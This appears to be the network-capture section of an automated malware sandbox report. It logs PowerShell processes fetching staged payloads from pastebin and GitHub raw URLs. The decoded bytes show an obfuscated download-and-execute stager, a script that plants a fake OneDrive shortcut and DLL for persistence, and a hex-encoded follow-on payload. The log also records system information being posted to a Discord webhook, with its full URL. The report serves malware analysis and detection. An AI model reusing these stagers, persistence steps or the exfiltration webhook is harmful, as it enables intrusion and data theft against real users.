                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Tue, 15 Oct 2024 14:54:02 GMT
                                                                                    Location: https://pastebin.com/raw/sA04Mwk2
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304c7c0a5e0ba7-DFW
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.949713185.199.111.133804860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 15:54:03.233604908 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 15:54:03.848824978 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Length: 0
                                                                                    Server: Varnish
                                                                                    Retry-After: 0
                                                                                    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 13:54:03 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210121-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729000444.783821,VS0,VE0
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Expires: Tue, 15 Oct 2024 13:59:03 GMT
                                                                                    Vary: Authorization,Accept-Encoding


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.949715185.199.111.133805584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 15:54:04.829592943 CEST227OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 15:54:05.442601919 CEST546INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Length: 0
                                                                                    Server: Varnish
                                                                                    Retry-After: 0
                                                                                    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 13:54:05 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210097-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729000445.375268,VS0,VE0
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Expires: Tue, 15 Oct 2024 13:59:05 GMT
                                                                                    Vary: Authorization,Accept-Encoding


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.949717172.67.19.24805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 15:54:09.590667963 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 15:54:10.223565102 CEST472INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Tue, 15 Oct 2024 13:54:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Tue, 15 Oct 2024 14:54:10 GMT
                                                                                    Location: https://pastebin.com/raw/sA04Mwk2
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304cad4e5a4680-DFW
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.949719185.199.111.133805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 15, 2024 15:54:11.100914001 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    Oct 15, 2024 15:54:11.711813927 CEST541INHTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    Content-Length: 0
                                                                                    Server: Varnish
                                                                                    Retry-After: 0
                                                                                    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 13:54:11 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210090-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729000452.646764,VS0,VE0
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Expires: Tue, 15 Oct 2024 13:59:11 GMT
                                                                                    Vary: Authorization,Accept-Encoding


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.949711172.67.19.244434860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:03 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:03 UTC396INHTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 13:54:03 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 93
                                                                                    Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304c815ed63474-DFW
                                                                                    2024-10-15 13:54:03 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                    Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                    2024-10-15 13:54:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.949712162.159.138.232443316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:03 UTC333OUTPOST /api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSG HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 214
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:03 UTC25INHTTP/1.1 100 Continue
                                                                                    2024-10-15 13:54:03 UTC214OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 74 69 6e 61 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 68 69 64 64 65 6e 5a 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 54 50 35 53 45 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                    Data Ascii: { "content": "**user** has joined - hiddenZ\n----------------------------------\n**GPU:** STP5SE\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                    2024-10-15 13:54:04 UTC1300INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 15 Oct 2024 13:54:04 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729000445
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEtpHLoB0j6E8hurvYYTiMNQi%2B1fg6KkcpNeYpMpChEZslaumo84f8Lhcx3Us24g0K%2FRZBvyo6eEiRTtgxjXH0nXZS4yEyuQu5qjpmYFI2D7qD2BAp%2F30LUjGjim"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=e5481effafbe83c674b6e60947d49a354db44d76-1729000444; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=O2791xR3gowCquLJm3YPQJlFHPawLttdxQ93ZxTPnIA-1729000444058-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d304c862a3a2e79-DFW
                                                                                    {"message": "Unknown Webhook", "code": 10015}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.949714185.199.111.1334434860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:04 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:04 UTC901INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 7508
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 13:54:04 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdal2120021-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 1
                                                                                    X-Timer: S1729000445.569891,VS0,VE1
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: e4ce96850b49c4063a8e71b5dec1d1f31887fa5c
                                                                                    Expires: Tue, 15 Oct 2024 13:59:04 GMT
                                                                                    Source-Age: 92
                                                                                    2024-10-15 13:54:04 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                    2024-10-15 13:54:04 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                    2024-10-15 13:54:04 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                    2024-10-15 13:54:04 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                    2024-10-15 13:54:04 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 13:54:04 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.949716185.199.111.1334435584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 13:54:06 UTC227OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 13:54:06 UTC903INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 159293
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    ETag: "80ad5dac8b21f93f5913af03c53e98e879731d41370452cf941cf04d26ae655d"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: FE80:2F2726:B07929:C031F5:670E73FC
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 13:54:06 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210114-DFW
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729000446.193586,VS0,VE104
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: c9d0679bb26edc0aa857692b1e60d5a292a08a08
                                                                                    Expires: Tue, 15 Oct 2024 13:59:06 GMT
                                                                                    Source-Age: 0
                                                                                    2024-10-15 13:54:06 UTC1378INData Raw: 24 62 79 74 65 73 20 3d 20 40 28 30 78 32 34 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 30 2c 20 30 78 30 30 2c 20 30 78 32 32 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 37 39
                                                                                    Data Ascii: $bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79
